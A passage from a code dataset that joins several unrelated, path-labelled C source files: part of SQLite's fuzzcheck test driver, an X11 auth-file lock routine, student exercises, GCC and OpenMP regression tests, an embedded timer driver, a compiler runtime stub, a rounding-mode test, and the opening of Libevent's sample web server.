&pStmt, 0); if( rc ) fatalError("cannot prepare statement [%s]: %s", zInsSql, sqlite3_errmsg(db)); rc = sqlite3_exec(db, "BEGIN", 0, 0, 0); if( rc ) fatalError("cannot start a transaction"); for(i=iFirstInsArg; i<argc; i++){ if( strcmp(argv[i],"-")==0 ){ /* A filename of "-" means read multiple filenames from stdin */ char zLine[2000]; while( rc==0 && fgets(zLine,sizeof(zLine),stdin)!=0 ){ size_t kk = strlen(zLine); while( kk>0 && zLine[kk-1]<=' ' ) kk--; sqlite3_bind_text(pStmt, 1, zLine, (int)kk, SQLITE_STATIC); if( verboseFlag ) printf("loading %.*s\n", (int)kk, zLine); sqlite3_step(pStmt); rc = sqlite3_reset(pStmt); if( rc ) fatalError("insert failed for %s", zLine); } }else{ sqlite3_bind_text(pStmt, 1, argv[i], -1, SQLITE_STATIC); if( verboseFlag ) printf("loading %s\n", argv[i]); sqlite3_step(pStmt); rc = sqlite3_reset(pStmt); if( rc ) fatalError("insert failed for %s", argv[i]); } } sqlite3_finalize(pStmt); rc = sqlite3_exec(db, "COMMIT", 0, 0, 0); if( rc ) fatalError("cannot commit the transaction: %s", sqlite3_errmsg(db)); rebuild_database(db, dbSqlOnly); sqlite3_close(db); return 0; } rc = sqlite3_exec(db, "PRAGMA query_only=1;", 0, 0, 0); if( rc ) fatalError("cannot set database to query-only"); if( zExpDb!=0 || zExpSql!=0 ){ sqlite3_create_function(db, "writefile", 2, SQLITE_UTF8, 0, writefileFunc, 0, 0); if( zExpDb!=0 ){ const char *zExDb = "SELECT writefile(printf('%s/db%06d.db',?1,dbid),dbcontent)," " dbid, printf('%s/db%06d.db',?1,dbid), length(dbcontent)" " FROM db WHERE ?2<0 OR dbid=?2;"; rc = sqlite3_prepare_v2(db, zExDb, -1, &pStmt, 0); if( rc ) fatalError("cannot prepare statement [%s]: %s", zExDb, sqlite3_errmsg(db)); sqlite3_bind_text64(pStmt, 1, zExpDb, strlen(zExpDb), SQLITE_STATIC, SQLITE_UTF8); sqlite3_bind_int(pStmt, 2, onlyDbid); while( sqlite3_step(pStmt)==SQLITE_ROW ){ printf("write db-%d (%d bytes) into %s\n", sqlite3_column_int(pStmt,1), sqlite3_column_int(pStmt,3), sqlite3_column_text(pStmt,2)); } sqlite3_finalize(pStmt); } if( zExpSql!=0 ){ const char *zExSql = "SELECT writefile(printf('%s/sql%06d.txt',?1,sqlid),sqltext)," " sqlid, printf('%s/sql%06d.txt',?1,sqlid), length(sqltext)" " FROM xsql WHERE ?2<0 OR sqlid=?2;"; rc = sqlite3_prepare_v2(db, zExSql, -1, &pStmt, 0); if( rc ) fatalError("cannot prepare statement [%s]: %s", zExSql, sqlite3_errmsg(db)); sqlite3_bind_text64(pStmt, 1, zExpSql, strlen(zExpSql), SQLITE_STATIC, SQLITE_UTF8); sqlite3_bind_int(pStmt, 2, onlySqlid); while( sqlite3_step(pStmt)==SQLITE_ROW ){ printf("write sql-%d (%d bytes) into %s\n", sqlite3_column_int(pStmt,1), sqlite3_column_int(pStmt,3), sqlite3_column_text(pStmt,2)); } sqlite3_finalize(pStmt); } sqlite3_close(db); return 0; } /* Load all SQL script content and all initial database images from the ** source db */ blobListLoadFromDb(db, "SELECT sqlid, sqltext FROM xsql", onlySqlid, &g.nSql, &g.pFirstSql); if( g.nSql==0 ) fatalError("need at least one SQL script"); blobListLoadFromDb(db, "SELECT dbid, dbcontent FROM db", onlyDbid, &g.nDb, &g.pFirstDb); if( g.nDb==0 ){ g.pFirstDb = safe_realloc(0, sizeof(Blob)); memset(g.pFirstDb, 0, sizeof(Blob)); g.pFirstDb->id = 1; g.pFirstDb->seq = 0; g.nDb = 1; sqlFuzz = 1; } /* Print the description, if there is one */ if( !quietFlag && !bScript ){ zDbName = azSrcDb[iSrcDb]; i = (int)strlen(zDbName) - 1; while( i>0 && zDbName[i-1]!='/' && zDbName[i-1]!='\\' ){ i--; } zDbName += i; sqlite3_prepare_v2(db, "SELECT msg FROM readme", -1, &pStmt, 0); if( pStmt && sqlite3_step(pStmt)==SQLITE_ROW ){ printf("%s: %s\n", zDbName, sqlite3_column_text(pStmt,0)); } sqlite3_finalize(pStmt); } /* Rebuild the database, if requested */ if( rebuildFlag ){ if( !quietFlag ){ printf("%s: rebuilding... ", zDbName); fflush(stdout); } rebuild_database(db, 0); if( !quietFlag ) printf("done\n"); } /* Close the source database. Verify that no SQLite memory allocations are ** outstanding. */ sqlite3_close(db); if( sqlite3_memory_used()>0 ){ fatalError("SQLite has memory in use before the start of testing"); } /* Limit available memory, if requested */ sqlite3_shutdown(); if( nMemThisDb>0 && nMem==0 ){ if( !nativeMalloc ){ pHeap = realloc(pHeap, nMemThisDb); if( pHeap==0 ){ fatalError("failed to allocate %d bytes of heap memory", nMem); } sqlite3_config(SQLITE_CONFIG_HEAP, pHeap, nMemThisDb, 128); }else{ sqlite3_hard_heap_limit64((sqlite3_int64)nMemThisDb); } }else{ sqlite3_hard_heap_limit64(0); } /* Disable lookaside with the --native-malloc option */ if( nativeMalloc ){ sqlite3_config(SQLITE_CONFIG_LOOKASIDE, 0, 0); } /* Reset the in-memory virtual filesystem */ formatVfs(); /* Run a test using each SQL script against each database. */ if( !verboseFlag && !quietFlag && !bSpinner && !bScript ){ printf("%s:", zDbName); } for(pSql=g.pFirstSql; pSql; pSql=pSql->pNext){ tmStart = timeOfDay(); if( isDbSql(pSql->a, pSql->sz) ){ sqlite3_snprintf(sizeof(g.zTestName), g.zTestName, "sqlid=%d",pSql->id); if( bScript ){ /* No progress output */ }else if( bSpinner ){ int nTotal =g.nSql; int idx = pSql->seq; printf("\r%s: %d/%d ", zDbName, idx, nTotal); fflush(stdout); }else if( verboseFlag ){ printf("%s\n", g.zTestName); fflush(stdout); }else if( !quietFlag ){ static int prevAmt = -1; int idx = pSql->seq; int amt = idx*10/(g.nSql); if( amt!=prevAmt ){ printf(" %d%%", amt*10); fflush(stdout); prevAmt = amt; } } if( nSkip>0 ){ nSkip--; }else{ runCombinedDbSqlInput(pSql->a, pSql->sz, iTimeout, bScript, pSql->id); } nTest++; if( bTimer && !bScript ){ sqlite3_int64 tmEnd = timeOfDay(); printf("%lld %s\n", tmEnd - tmStart, g.zTestName); } g.zTestName[0] = 0; disableOom(); continue; } for(pDb=g.pFirstDb; pDb; pDb=pDb->pNext){ int openFlags; const char *zVfs = "inmem"; sqlite3_snprintf(sizeof(g.zTestName), g.zTestName, "sqlid=%d,dbid=%d", pSql->id, pDb->id); if( bScript ){ /* No progress output */ }else if( bSpinner ){ int nTotal = g.nDb*g.nSql; int idx = pSql->seq*g.nDb + pDb->id - 1; printf("\r%s: %d/%d ", zDbName, idx, nTotal); fflush(stdout); }else if( verboseFlag ){ printf("%s\n", g.zTestName); fflush(stdout); }else if( !quietFlag ){ static int prevAmt = -1; int idx = pSql->seq*g.nDb + pDb->id - 1; int amt = idx*10/(g.nDb*g.nSql); if( amt!=prevAmt ){ printf(" %d%%", amt*10); fflush(stdout); prevAmt = amt; } } if( nSkip>0 ){ nSkip--; continue; } if( bScript ){ char zName[100]; sqlite3_snprintf(sizeof(zName), zName, "db%06d.db", pDb->id>1 ? pDb->id : pSql->id); renderDbSqlForCLI(stdout, zName, pDb->a, pDb->sz, pSql->a, pSql->sz); continue; } createVFile("main.db", pDb->sz, pDb->a); sqlite3_randomness(0,0); if( ossFuzzThisDb ){ #ifndef SQLITE_OSS_FUZZ fatalError("--oss-fuzz not supported: recompile" " with -DSQLITE_OSS_FUZZ"); #else extern int LLVMFuzzerTestOneInput(const uint8_t*, size_t); LLVMFuzzerTestOneInput((const uint8_t*)pSql->a, (size_t)pSql->sz); #endif }else{ openFlags = SQLITE_OPEN_CREATE | SQLITE_OPEN_READWRITE; if( nativeFlag && pDb->sz==0 ){ openFlags |= SQLITE_OPEN_MEMORY; zVfs = 0; } rc = sqlite3_open_v2("main.db", &db, openFlags, zVfs); if( rc ) fatalError("cannot open inmem database"); sqlite3_limit(db, SQLITE_LIMIT_LENGTH, 100000000); sqlite3_limit(db, SQLITE_LIMIT_LIKE_PATTERN_LENGTH, 50); if( cellSzCkFlag ) runSql(db, "PRAGMA cell_size_check=ON", runFlags); setAlarm((iTimeout+999)/1000); /* Enable test functions */ sqlite3_test_control(SQLITE_TESTCTRL_INTERNAL_FUNCTIONS, db); #ifndef SQLITE_OMIT_PROGRESS_CALLBACK if( sqlFuzz || vdbeLimitFlag ){ sqlite3_progress_handler(db, 100000, progressHandler, &vdbeLimitFlag); } #endif #ifdef SQLITE_TESTCTRL_PRNG_SEED sqlite3_test_control(SQLITE_TESTCTRL_PRNG_SEED, 1, db); #endif if( bVdbeDebug ){ sqlite3_exec(db, "PRAGMA vdbe_debug=ON", 0, 0, 0); } do{ runSql(db, (char*)pSql->a, runFlags); }while( timeoutTest ); setAlarm(0); sqlite3_exec(db, "PRAGMA temp_store_directory=''", 0, 0, 0); sqlite3_close(db); } if( sqlite3_memory_used()>0 ){ fatalError("memory leak: %lld bytes outstanding", sqlite3_memory_used()); } reformatVfs(); nTest++; if( bTimer ){ sqlite3_int64 tmEnd = timeOfDay(); printf("%lld %s\n", tmEnd - tmStart, g.zTestName); } g.zTestName[0] = 0; /* Simulate an error if the TEST_FAILURE environment variable is "5". ** This is used to verify that automated test script really do spot ** errors that occur in this test program. */ if( zFailCode ){ if( zFailCode[0]=='5' && zFailCode[1]==0 ){ fatalError("simulated failure"); }else if( zFailCode[0]!=0 ){ /* If TEST_FAILURE is something other than 5, just exit the test ** early */ printf("\nExit early due to TEST_FAILURE being set\n"); iSrcDb = nSrcDb-1; goto sourcedb_cleanup; } } } } if( bScript ){ /* No progress output */ }else if( bSpinner ){ int nTotal = g.nDb*g.nSql; printf("\r%s: %d/%d \n", zDbName, nTotal, nTotal); }else if( !quietFlag && !verboseFlag ){ printf(" 100%% - %d tests\n", g.nDb*g.nSql); } /* Clean up at the end of processing a single source database */ sourcedb_cleanup: blobListFree(g.pFirstSql); blobListFree(g.pFirstDb); reformatVfs(); } /* End loop over all source databases */ if( !quietFlag && !bScript ){ sqlite3_int64 iElapse = timeOfDay() - iBegin; printf("fuzzcheck: 0 errors out of %d tests in %d.%03d seconds\n" "SQLite %s %s\n", nTest, (int)(iElapse/1000), (int)(iElapse%1000), sqlite3_libversion(), sqlite3_sourceid()); } free(azSrcDb); free(pHeap); return 0; }
the_stack_data/1024470.c
/* $Xorg: AuLock.c,v 1.4 2001/02/09 02:03:42 xorgcvs Exp $ */ /* Copyright 1988, 1998 The Open Group Permission to use, copy, modify, distribute, and sell this software and its documentation for any purpose is hereby granted without fee, provided that the above copyright notice appear in all copies and that both that copyright notice and this permission notice appear in supporting documentation. The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE OPEN GROUP BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Except as contained in this notice, the name of The Open Group shall not be used in advertising or otherwise to promote the sale, use or other dealings in this Software without prior written authorization from The Open Group. */ /* $XFree86: xc/lib/Xau/AuLock.c,v 3.6 2002/05/31 18:45:43 dawes Exp $ */ #ifdef HAVE_CONFIG_H #include <config.h> #endif #include <X11/Xauth.h> #include <X11/Xos.h> #include <sys/stat.h> #include <errno.h> #include <time.h> #define Time_t time_t #ifndef X_NOT_POSIX #include <unistd.h> #else #ifndef WIN32 extern unsigned sleep (); #else #include <X11/Xwindows.h> #define link rename #endif #endif #ifdef __UNIXOS2__ #define link rename #endif int XauLockAuth ( _Xconst char *file_name, int retries, int timeout, long dead) { char creat_name[1025], link_name[1025]; struct stat statb; Time_t now; int creat_fd = -1; if (strlen (file_name) > 1022) return LOCK_ERROR; (void) strcpy (creat_name, file_name); (void) strcat (creat_name, "-c"); (void) strcpy (link_name, file_name); (void) strcat (link_name, "-l"); if (stat (creat_name, &statb) != -1) { now = time ((Time_t *) 0); /* * NFS may cause ctime to be before now, special * case a 0 deadtime to force lock removal */ if (dead == 0 || now - statb.st_ctime > dead) { (void) unlink (creat_name); (void) unlink (link_name); } } while (retries > 0) { if (creat_fd == -1) { creat_fd = open (creat_name, O_WRONLY | O_CREAT | O_EXCL, 0600); if (creat_fd == -1) { if (errno != EACCES) return LOCK_ERROR; } else (void) close (creat_fd); } if (creat_fd != -1) { if (link (creat_name, link_name) != -1) return LOCK_SUCCESS; if (errno == ENOENT) { creat_fd = -1; /* force re-creat next time around */ continue; } if (errno != EEXIST) return LOCK_ERROR; } (void) sleep ((unsigned) timeout); --retries; } return LOCK_TIMEOUT; }
the_stack_data/75136826.c
#include <stdio.h> #include <stdbool.h> #include <string.h> #define strSize 40 int main() { char s[strSize] = { '\0' }; char s1[strSize] = { '\0' }; printf("Enter first line: "); scanf("%s", &s); printf("Enter second line: "); scanf("%s", &s1); int counter = 0; bool different = false; const unsigned lengthS1 = strlen(s1); const unsigned border = strlen(s) - lengthS1 + 1; for (unsigned i = 0; i < border; ++i) { for (unsigned j = 0; j < lengthS1; ++j) { if (s[i + j] != s1[j]) { different = true; break; } } if (!different) { ++counter; } different = false; } printf("The second line occurs %d times in the first line.\n", counter); }
the_stack_data/193893469.c
// { dg-do run } extern void abort (void); int x = 6, cnt; int foo (void) { return cnt++; } int main () { int v, *p; p = &x; #pragma omp atomic update p[foo (), 0] = 16 + 6 - p[foo (), 0]; #pragma omp atomic read v = x; if (cnt != 2 || v != 16) abort (); #pragma omp atomic capture v = p[foo () + foo (), 0] = p[foo () + foo (), 0] + 3; if (cnt != 6 || v != 19) abort (); #pragma omp atomic capture v = p[foo (), 0] = 12 * 1 / 2 + (foo (), 0) + p[foo (), 0]; if (cnt != 9 || v != 25) abort (); #pragma omp atomic capture { v = p[foo () & 0]; p[foo () & 0] = (foo (), 1) * 9 - p[foo () & 0]; } if (cnt != 13 || v != 25) abort (); #pragma omp atomic read v = x; if (v != -16) abort (); #pragma omp atomic capture { p[0 & foo ()] = 16 - 2 + 3 + p[0 & foo ()]; v = p[0 & foo ()]; } if (cnt != 16 || v != 1) abort (); #pragma omp atomic capture { v = p[foo (), 0]; p[foo (), 0] = (foo (), 7) ? 13 : foo () + 6; } if (cnt != 19 || v != 1) abort (); #pragma omp atomic read v = x; if (v != 13) abort (); return 0; }
the_stack_data/3362.c
/* Lista de Exercícios 01 Exercício 04 Autor: Murilo Carvalho */ #include <stdio.h> int main(){ /* Elabore um algoritmo para calcular o salário final de um trabalhador, recebendo a quantidade de horas trabalhadas, a quantidade de horas extras, quantidade de horas ausentes e o valor do salário mínimo, sabendo que: a) as horas trabalhadas e ausentes valem 4% do salário mínimo; b) as horas extras valem 50% a mais do que as horas trabalhadas; c) o salário final é igual a soma das horas trabalhadas com as hora extras, descontadas as horas ausentes e 11% de INSS. */ float salarioFinal = 0.0; int qntdHorasTrabalhadas = 0; int qntdHorasExtras = 0; int qntdHorasAusentes = 0; float salarioMinimo = 0.0; float valorHorasTrabalhadas = 0.0; float valorHorasExtras = 0.0; float valorHorasAusentes = 0.0; float valorINSS = 0.0; printf("***** Folha de Pagamento *****"); printf("\n"); printf("Por favor, informe o valor atual do salario minimo:"); scanf("%f",&salarioMinimo); printf("Informe a quantidade de horas trabalhadas:"); scanf("%d",&qntdHorasTrabalhadas); valorHorasTrabalhadas = salarioMinimo*0.04*qntdHorasTrabalhadas; printf("Informe a quantidade de horas extras:"); scanf("%d",&qntdHorasExtras); valorHorasExtras = qntdHorasExtras*(salarioMinimo*0.04*1.5); printf("Informe a quantidade de horas ausentes:"); scanf("%d",&qntdHorasAusentes); valorHorasAusentes = salarioMinimo*0.04*qntdHorasAusentes; valorINSS = salarioMinimo*0.11; salarioFinal = valorHorasTrabalhadas + valorHorasExtras - valorHorasAusentes - valorINSS; printf("========== Salario final do(a) trabalhador(a) =============== \n"); printf("Salario Minimo.: R$%.2f \n",salarioMinimo); printf("Quantidade de Horas Trabalhadas | Valor: %5d | R$%5.2f \n", qntdHorasTrabalhadas, valorHorasTrabalhadas); printf("Quantidade de Horas Extras | Valor: %5d | R$%5.2f \n", qntdHorasExtras, valorHorasExtras); printf("Quantidade de Horas Ausentes | Valor: %5d | R$%5.2f \n", qntdHorasAusentes, valorHorasAusentes); printf("11% INSS: R$%5.2f \n", valorINSS); printf("Salario Final: R$%5.2f", salarioFinal); return 0; }
the_stack_data/808984.c
#include <stdio.h> void report_count(void); void accumulate(int k); int count = 0; int main(void) { int value; register int i; puts("Input the first number?\n"); while (scanf("%d", &value) == 1 && value > 0) { count++; for (i = value; i >= 0; i--) { accumulate(i); } puts("\nInput another number?\n"); } report_count(); puts("\nDone"); return 0; } void report_count(void) { printf("Loop executed %d times\n", count); }
the_stack_data/793122.c
/* MIT License Copyright (c) John Blaiklock 2019 miniwin Embedded Window Manager Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ #ifdef CPU_LPC54628J512ET180 /*************** *** INCLUDES *** ***************/ #include <stdint.h> #include "fsl_ctimer.h" #include "fsl_gpio.h" #include "hal/hal_timer.h" #include "miniwin_config.h" /**************** *** CONSTANTS *** ****************/ #define APP_BOARD_TEST_LED_PORT 2U #define APP_BOARD_TEST_LED_PIN 2U /************ *** TYPES *** ************/ /*********************** *** GLOBAL VARIABLES *** ***********************/ volatile uint32_t mw_tick_counter; /************************* *** EXTERNAL VARIABLES *** **************************/ /********************** *** LOCAL VARIABLES *** **********************/ /******************************** *** LOCAL FUNCTION PROTOTYPES *** ********************************/ /********************** *** LOCAL FUNCTIONS *** **********************/ /*********************** *** GLOBAL FUNCTIONS *** ***********************/ void mw_hal_timer_fired(void) { mw_tick_counter++; } void mw_hal_timer_init(void) { ctimer_config_t config; ctimer_match_config_t matchConfig; gpio_pin_config_t led_config = { kGPIO_DigitalOutput, 0U }; GPIO_PortInit(GPIO, APP_BOARD_TEST_LED_PORT); GPIO_PinInit(GPIO, APP_BOARD_TEST_LED_PORT, APP_BOARD_TEST_LED_PIN, &led_config); /* enable the asynchronous bridge */ SYSCON->ASYNCAPBCTRL = 1U; /* use 12 MHz clock for some of the ctimers */ CLOCK_AttachClk(kFRO12M_to_ASYNC_APB); CTIMER_GetDefaultConfig(&config); CTIMER_Init(CTIMER3, &config); matchConfig.enableCounterReset = true; matchConfig.enableCounterStop = false; matchConfig.matchValue = CLOCK_GetFreq(kCLOCK_AsyncApbClk) / MW_TICKS_PER_SECOND; matchConfig.outControl = kCTIMER_Output_NoAction; matchConfig.enableInterrupt = true; CTIMER_SetupMatch(CTIMER3, kCTIMER_Match_1, &matchConfig); CTIMER_StartTimer(CTIMER3); } void CTIMER3_IRQHandler(void) { /* clear any status flags that were set */ uint32_t int_stat = CTIMER_GetStatusFlags(CTIMER3); CTIMER_ClearStatusFlags(CTIMER3, int_stat); mw_hal_timer_fired(); GPIO_PortToggle(GPIO, APP_BOARD_TEST_LED_PORT, 1U << APP_BOARD_TEST_LED_PIN); } #endif
the_stack_data/29824637.c
/* PR target/5755 This testcase failed because the caller of a function returning struct expected the callee to pop up the hidden return structure pointer, while callee was actually not poping it up (as the hidden argument was passed in register). */ /* { dg-do run { target i?86-*-* } } */ /* { dg-options "-O2 -fomit-frame-pointer" } */ extern void abort (void); extern void exit (int); typedef struct { int a1, a2; } A; A a; A __attribute__ ((regparm (2))) foo (int x) { return a; } int __attribute__ ((regparm (2))) bar (int x) { int r = foo(0).a2; return r; } int main () { int f; a.a1 = 530; a.a2 = 980; f = bar (0); if (f != 980) abort (); exit (0); }
the_stack_data/32950536.c
#include <stdio.h> #include <stdint.h> #include <stdlib.h> extern int64_t our_code_starts_here() asm("our_code_starts_here"); typedef uint64_t SNAKEVAL; const uint64_t BOOL_TAG = 0x0000000000000001; const SNAKEVAL BOOL_TRUE = 0x8000000000000001; // These must be the same values const SNAKEVAL BOOL_FALSE = 0x0000000000000001; // as chosen in compile.ml SNAKEVAL print(SNAKEVAL val) { if ((val & BOOL_TAG) == 0) { // val is even ==> number printf("%ld", ((int64_t)(val)) / 2); // shift bits right to remove tag } else if (val == BOOL_TRUE) { printf("true"); } else if (val == BOOL_FALSE) { printf("false"); } else { printf("Unknown value: %#018lx", val); // print unknown val in hex } return val; } const int ERR_NOT_NUMBER = 1; const int ERR_NOT_BOOLEAN = 2; // other error codes here void error(int errCode, SNAKEVAL val) { if (errCode == ERR_NOT_NUMBER) { fprintf(stderr, "Expected number, but got %#018lx\n", val); } else if (errCode == ERR_NOT_BOOLEAN) { fprintf(stderr, "Expected Boolean, but got %#018lx\n", val); } else { fprintf(stderr, "Unknown error %d, got %#018lx\n", errCode, val); } exit(errCode); } SNAKEVAL max (SNAKEVAL a, SNAKEVAL b) { if (a > b) return a; else return b; } SNAKEVAL foo(SNAKEVAL a, SNAKEVAL b) { if (a == b) return BOOL_TRUE; else return BOOL_FALSE; } int main(int argc, char** argv) { SNAKEVAL result = our_code_starts_here(); print(result); printf("\n"); return 0; }
the_stack_data/16232.c
/* * Copyright (c) 2013 The Native Client Authors. All rights reserved. * Use of this source code is governed by a BSD-style license that can be * found in the LICENSE file. */ /* * Test rounding behavior, checking and setting the rounding mode. */ #include <float.h> #include <math.h> #include <stdio.h> #include <stdlib.h> volatile double two = 2.0; volatile double one = 1.0; volatile double zero = 0.0; volatile double neg_one = -1.0; volatile double neg_two = -2.0; #define ASSERT_TRUE(pred) \ if (!pred) { \ fprintf(stderr, "file %s, line %d, !(" #pred ")\n", \ __FILE__, __LINE__); \ } #define ASSERT_EQ(f1, f2) \ do { \ double x = f1; \ double y = f2; \ if (x != y) { \ fprintf(stderr, "file %s, line %d, %f != %f\n", \ __FILE__, __LINE__, x, y); \ abort(); \ } \ } while(0) void __attribute__((noinline)) test_flt_rounds(int); void test_flt_rounds(int expected_round) { ASSERT_EQ(FLT_ROUNDS, expected_round); } extern void set_round_toward_nearest(void); extern void set_round_toward_plus_infinity(void); extern void set_round_toward_minus_infinity(void); extern void set_round_toward_zero(void); /* Test that nearbyint() really does round to nearest. */ void __attribute__((noinline)) test_round_to_nearest(void); void test_round_to_nearest(void) { ASSERT_EQ(nearbyint(one + 0.5), two); ASSERT_EQ(nearbyint(zero + 0.5), zero); ASSERT_EQ(nearbyint(zero), zero); ASSERT_EQ(nearbyint(-zero), -zero); ASSERT_EQ(nearbyint(neg_one + 0.5), -zero); ASSERT_TRUE(isnan(nearbyint(NAN))); ASSERT_EQ(nearbyint(INFINITY), INFINITY); } /* Test that nearbyint() really does round to plus infinity. */ void __attribute__((noinline)) test_round_to_plus_infinity(void); void test_round_to_plus_infinity(void) { ASSERT_EQ(nearbyint(one + 0.5), two); ASSERT_EQ(nearbyint(zero + 0.5), one); ASSERT_EQ(nearbyint(zero), zero); ASSERT_EQ(nearbyint(-zero), -zero); ASSERT_EQ(nearbyint(neg_one + 0.5), -zero); ASSERT_TRUE(isnan(nearbyint(NAN))); ASSERT_EQ(nearbyint(INFINITY), INFINITY); } /* Test that nearbyint() really does round to minus infinity. */ void __attribute__((noinline)) test_round_to_minus_infinity(void); void test_round_to_minus_infinity(void) { ASSERT_EQ(nearbyint(one + 0.5), one); ASSERT_EQ(nearbyint(zero + 0.5), zero); ASSERT_EQ(nearbyint(zero), zero); ASSERT_EQ(nearbyint(-zero), -zero); ASSERT_EQ(nearbyint(neg_one + 0.5), neg_one); ASSERT_TRUE(isnan(nearbyint(NAN))); ASSERT_EQ(nearbyint(INFINITY), INFINITY); } /* Test that nearbyint() really does round to zero. */ void __attribute__((noinline)) test_round_to_zero(void); void test_round_to_zero(void) { ASSERT_EQ(nearbyint(one + 0.5), one); ASSERT_EQ(nearbyint(zero + 0.5), zero); ASSERT_EQ(nearbyint(zero), zero); ASSERT_EQ(nearbyint(-zero), -zero); ASSERT_EQ(nearbyint(neg_one + 0.5), -zero); ASSERT_TRUE(isnan(nearbyint(NAN))); ASSERT_EQ(nearbyint(INFINITY), INFINITY); } int main(int ac, char* av[]) { #if defined(__mips__) /* For MIPS, the llvm.flt.rounds intrinsic is stuck at (1), so we cannot * test the other cases. Furthermore, the llvm MIPS asm parser doesn't * parse the cfc1 $reg, $31 and ctc1 instructions for setting * the rounding mode. * * At least test that initial value is always round towards nearest. */ test_flt_rounds(1); test_round_to_nearest(); #else /* Test that initial value is always round towards nearest. */ test_flt_rounds(1); test_round_to_nearest(); set_round_toward_plus_infinity(); /* * GCC + Newlib and Glibc always return 1 for FLT_ROUNDS, * so we can't really test FLT_ROUNDS. However, we can observe the * difference through nearbyint() behavior: * http://gcc.gnu.org/bugzilla/show_bug.cgi?id=30569 */ #if defined(__clang__) test_flt_rounds(2); #endif test_round_to_plus_infinity(); set_round_toward_minus_infinity(); #if defined(__clang__) test_flt_rounds(3); #endif test_round_to_minus_infinity(); set_round_toward_zero(); #if defined(__clang__) test_flt_rounds(0); #endif test_round_to_zero(); set_round_toward_nearest(); #endif /* __mips__ */ test_flt_rounds(1); test_round_to_nearest(); return 0; }
the_stack_data/31574.c
/* A trivial static http webserver using Libevent's evhttp. This is not the best code in the world, and it does some fairly stupid stuff that you would never want to do in a production webserver. Caveat hackor! */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/stat.h> #ifdef _WIN32 #include <winsock2.h> #include <ws2tcpip.h> #include <windows.h> #include <io.h> #include <fcntl.h> #ifndef S_ISDIR #define S_ISDIR(x) (((x) & S_IFMT) == S_IFDIR) #endif #else #include <sys/stat.h> #include <sys/socket.h> #include <signal.h> #include <fcntl.h> #include <unistd.h> #include <dirent.h> #endif #include <event2/event.h> #include <event2/http.h> #include <event2/buffer.h> #include <event2/util.h> #include <event2/keyvalq_struct.h> #ifdef EVENT__HAVE_NETINET_IN_H #include <netinet/in.h> # ifdef _XOPEN_SOURCE_EXTENDED # include <arpa/inet.h> # endif #endif #ifdef _WIN32 #ifndef stat #define stat _stat #endif #ifndef fstat #define fstat _fstat #endif #ifndef open #define open _open #endif #ifndef close #define close _close #endif #ifndef O_RDONLY #define O_RDONLY _O_RDONLY #endif #endif char uri_root[512]; static const struct table_entry { const char *extension; const char *content_type; } content_type_table[] = { { "txt", "text/plain" }, { "c", "text/plain" }, { "h", "text/plain" }, { "html", "text/html" }, { "htm", "text/htm" }, { "css", "text/css" }, { "gif", "image/gif" }, { "jpg", "image/jpeg" }, { "jpeg", "image/jpeg" }, { "png", "image/png" }, { "pdf", "application/pdf" }, { "ps", "application/postsript" }, { NULL, NULL }, }; /* Try to guess a good content-type for 'path' */ static const char * guess_content_type(const char *path) { const char *last_period, *extension; const struct table_entry *ent; last_period = strrchr(path, '.'); if (!last_period || strchr(last_period, '/')) goto not_found; /* no exension */ extension = last_period + 1; for (ent = &content_type_table[0]; ent->extension; ++ent) { if (!evutil_ascii_strcasecmp(ent->extension, extension)) return ent->content_type; } not_found: return "application/misc"; } /* Callback used for the /dump URI, and for every non-GET request: * dumps all information to stdout and gives back a trivial 200 ok */ static void dump_request_cb(struct evhttp_request *req, void *arg) { const char *cmdtype; struct evkeyvalq *headers; struct evkeyval *header; struct evbuffer *buf; switch (evhttp_request_get_command(req)) { case EVHTTP_REQ_GET: cmdtype = "GET"; break; case EVHTTP_REQ_POST: cmdtype = "POST"; break; case EVHTTP_REQ_HEAD: cmdtype = "HEAD"; break; case EVHTTP_REQ_PUT: cmdtype = "PUT"; break; case EVHTTP_REQ_DELETE: cmdtype = "DELETE"; break; case EVHTTP_REQ_OPTIONS: cmdtype = "OPTIONS"; break; case EVHTTP_REQ_TRACE: cmdtype = "TRACE"; break; case EVHTTP_REQ_CONNECT: cmdtype = "CONNECT"; break; case EVHTTP_REQ_PATCH: cmdtype = "PATCH"; break; default: cmdtype = "unknown"; break; } printf("Received a %s request for %s\nHeaders:\n", cmdtype, evhttp_request_get_uri(req)); headers = evhttp_request_get_input_headers(req); for (header = headers->tqh_first; header; header = header->next.tqe_next) { printf(" %s: %s\n", header->key, header->value); } buf = evhttp_request_get_input_buffer(req); puts("Input data: <<<"); while (evbuffer_get_length(buf)) { int n; char cbuf[128]; n = evbuffer_remove(buf, cbuf, sizeof(cbuf)); if (n > 0) (void) fwrite(cbuf, 1, n, stdout); } puts(">>>"); evhttp_send_reply(req, 200, "OK", NULL); } /* This callback gets invoked when we get any http request that doesn't match * any other callback. Like any evhttp server callback, it has a simple job: * it must eventually call evhttp_send_error() or evhttp_send_reply(). */ static void send_document_cb(struct evhttp_request *req, void *arg) { struct evbuffer *evb = NULL; const char *docroot = arg; const char *uri = evhttp_request_get_uri(req); struct 